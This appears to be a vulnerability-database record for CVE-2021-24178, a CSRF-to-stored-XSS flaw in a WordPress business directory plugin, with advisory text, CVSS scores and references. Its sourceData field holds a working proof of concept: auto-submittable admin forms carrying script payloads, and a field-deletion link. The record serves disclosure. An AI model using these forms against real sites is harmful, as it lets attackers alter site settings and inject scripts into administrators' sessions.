The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged-in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has been fixed and proper capability checks have also been added in 5.11.1; however, some sanitisation was still missing, still allowing XSS via a high-privilege account in other pages, and a different issue has been created for it.
{"id": "WPEX-ID:700F3B04-8298-447C-8D3C-4581880A63B5", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Business Directory Plugin < 5.11.1 - Arbitrary Add/Edit/Delete Form Field to Stored XSS", "description": "The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues. Note (WPScanTeam): The CSRF has been fixed and proper capability checks have also been added in 5.11.1, however some sanitisation was still missing, still allowing XSS via a high privilege account in other pages and a different issue has been created for it\n", "published": "2021-04-11T00:00:00", "modified": "2021-04-15T07:01:52", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "0xB9", "references": [], "cvelist": ["CVE-2021-24178"], "immutableFields": [], "lastseen": "2021-05-14T11:29:20", "viewCount": 34, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24178"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:700F3B04-8298-447C-8D3C-4581880A63B5"]}], "rev": 4}, "score": {"value": 4.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24178"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:700F3B04-8298-447C-8D3C-4581880A63B5"]}]}, "exploitation": null, "vulnersScore": 4.0}, "sourceData": "<!-- Change Form Field XSS -->\r\n<form action=\"https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1\" method=\"post\">\r\n<input type=\"hidden\" name=\"field[id]\" value=\"1\">\r\n<input type=\"hidden\" name=\"field[tag]\" value=\"title\"> <input type=\"hidden\" name=\"field[weight]\" value=\"9\">\r\n<label> Field Label </label>\r\n<input name=\"field[label]\" type=\"text\" aria-required=\"true\" value=\"<script>alert(1)</script>\">\r\n<label> Field description <span 
class=\"description\">(optional)</span></label>\r\n<input name=\"field[description]\" type=\"text\" value=\"<script>alert(1)</script>\">\r\n<input type=\"submit\" name=\"submit\" id=\"submit\" class=\"button button-primary\" value=\"Update Field\">\r\n</form>\r\n\r\n<!-- Add Form Field XSS -->\r\n<form action=\"https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1\" method=\"post\">\r\n<label> Field Label </label>\r\n<input name=\"field[label]\" type=\"text\" aria-required=\"true\" value=\"<script>alert(1)</script>\"> \r\n<label> Field description <span class=\"description\">(optional)</span></label>\r\n<input name=\"field[description]\" type=\"text\" value=\"<script>alert(1)</script>\">\r\n<input type=\"submit\" name=\"submit\" id=\"submit\" class=\"button button-primary\" value=\"Update Field\"> \r\n</form>\r\n\r\nXSS payloads execute:\r\n- On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing\r\n- On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv\r\n- When adding/editing a listing /wp-admin/post-new.php?post_type=wpbdp_listing\r\n- On various Settings page, such as /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=listings%2Fsorting, /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=search_settings\r\n\r\n<!-- Delete Form Field-->\r\n<a href=\"https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1\">Delete</a>", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645946249}}
{"cve": [{"lastseen": "2022-03-23T14:48:41", "description": "The Business Directory Plugin \u2013 Easy Listing Directories for WordPress WordPress plugin before 5.11.1 suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site Scripting issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-24178", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24178"], "modified": "2021-05-13T18:01:00", "cpe": [], "id": "CVE-2021-24178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24178", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-05-14T11:29:20", "bulletinFamily": "software", "cvelist": ["CVE-2021-24178"], "description": "The plugin suffered from Cross-Site Request Forgery issues, allowing an attacker to make a logged in administrator add, edit or delete form fields, which could also lead to Stored Cross-Site 
Scripting issues. Note (WPScanTeam): The CSRF has been fixed and proper capability checks have also been added in 5.11.1, however some sanitisation was still missing, still allowing XSS via a high privilege account in other pages and a different issue has been created for it\n\n### PoC\n\nField Label Field description (optional) Field Label Field description (optional) XSS payloads execute: \\- On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing \\- On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv \\- When adding/editing a listing /wp-admin/post-new.php?post_type=wpbdp_listing \\- On various Settings page, such as /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=listings%2Fsorting, /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=search_settings [Delete](<https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1>)\n", "modified": "2021-04-15T07:01:52", "id": "WPVDB-ID:700F3B04-8298-447C-8D3C-4581880A63B5", "href": "https://wpscan.com/vulnerability/700f3b04-8298-447c-8d3c-4581880a63b5", "published": "2021-04-11T00:00:00", "type": "wpvulndb", "title": "Business Directory Plugin < 5.11.1 - Arbitrary Add/Edit/Delete Form Field to Stored XSS", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}